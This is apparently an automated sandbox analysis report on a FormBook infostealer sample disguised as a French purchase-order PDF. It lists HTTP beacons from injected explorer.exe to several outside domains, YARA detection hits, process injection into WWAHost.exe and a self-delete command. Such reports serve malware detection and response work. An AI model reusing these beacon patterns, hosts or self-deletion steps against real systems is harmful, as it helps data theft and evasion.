                                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.34974123.227.38.7480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Aug 3, 2021 20:12:42.716824055 CEST5549OUTGET /ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX HTTP/1.1
                                                                Host: www.shopvybz.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Aug 3, 2021 20:12:42.819216013 CEST5550INHTTP/1.1 403 Forbidden
                                                                Date: Tue, 03 Aug 2021 18:12:42 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                X-Sorting-Hat-PodId: 193
                                                                X-Sorting-Hat-ShopId: 46504476822
                                                                X-Request-ID: 5a30c7d5-1d11-4512-a8a2-713f34fc3e7e
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Dc: gcp-europe-west1
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 679184070f52dff7-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.349742162.241.218.9780C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Aug 3, 2021 20:12:48.131254911 CEST5556OUTGET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ HTTP/1.1
                                                                Host: www.handybusy.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Aug 3, 2021 20:12:49.884164095 CEST5556INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 03 Aug 2021 18:12:49 GMT
                                                                Server: nginx/1.19.10
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 0
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Location: https://www.handybusy.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/
                                                                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                X-Endurance-Cache-Level: 2
                                                                X-Server-Cache: true
                                                                X-Proxy-Cache: MISS


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.34974334.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Aug 3, 2021 20:12:53.718667030 CEST5557OUTGET /ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX HTTP/1.1
                                                                Host: www.theassistedadrscheme.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Aug 3, 2021 20:12:53.832051039 CEST5558INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Tue, 03 Aug 2021 18:12:53 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "6104856e-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.349744160.153.138.21980C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Aug 3, 2021 20:12:58.918533087 CEST5559OUTGET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh HTTP/1.1
                                                                Host: www.indiadesignstory.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Aug 3, 2021 20:12:58.958533049 CEST5560INHTTP/1.1 301 Moved Permanently
                                                                Age: 0
                                                                Content-Security-Policy: upgrade-insecure-requests
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Date: Tue, 03 Aug 2021 18:12:58 GMT
                                                                Location: https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh
                                                                Vary: User-Agent, Accept-Encoding
                                                                X-Backend: local
                                                                X-Cache: uncached
                                                                X-Cache-Hit: MISS
                                                                X-Cacheable: NO:HTTPS Redirect
                                                                Content-Length: 343
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 64 65 73 69 67 6e 73 74 6f 72 79 2e 63 6f 6d 2f 61 6a 73 38 2f 3f 71 34 38 64 3d 48 46 51 4c 70 74 59 70 4b 58 26 61 6d 70 3b 33 66 42 6c 56 58 6d 3d 4c 45 6a 55 4d 55 2b 72 77 2b 6d 31 4d 47 4c 63 69 36 78 4c 61 34 6b 4e 50 50 64 55 50 6a 36 61 6f 4b 52 73 6a 65 4d 2f 73 43 45 79 30 50 61 4e 57 77 7a 76 37 6a 50 32 45 34 61 38 5a 7a 62 30 41 52 54 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.indiadesignstory.com/ajs8/?q48d=HFQLptYpKX&amp;3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.34974534.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Aug 3, 2021 20:13:09.126152992 CEST5561OUTGET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC HTTP/1.1
                                                                Host: www.trucktodock.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Aug 3, 2021 20:13:09.239820004 CEST5561INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Tue, 03 Aug 2021 18:13:09 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "6104831f-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:20:11:06
                                                                Start date:03/08/2021
                                                                Path:C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
                                                                Imagebase:0x5e0000
                                                                File size:1327104 bytes
                                                                MD5 hash:E1D1316D5BC047EC817B950286734ED0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:low

                                                                General

                                                                Start time:20:11:26
                                                                Start date:03/08/2021
                                                                Path:C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe
                                                                Imagebase:0xf90000
                                                                File size:1327104 bytes
                                                                MD5 hash:E1D1316D5BC047EC817B950286734ED0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:20:11:28
                                                                Start date:03/08/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff714890000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:20:11:45
                                                                Start date:03/08/2021
                                                                Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                                Imagebase:0x2f0000
                                                                File size:829856 bytes
                                                                MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                General

                                                                Start time:20:11:50
                                                                Start date:03/08/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe'
                                                                Imagebase:0xbd0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:20:11:50
                                                                Start date:03/08/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6b2800000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >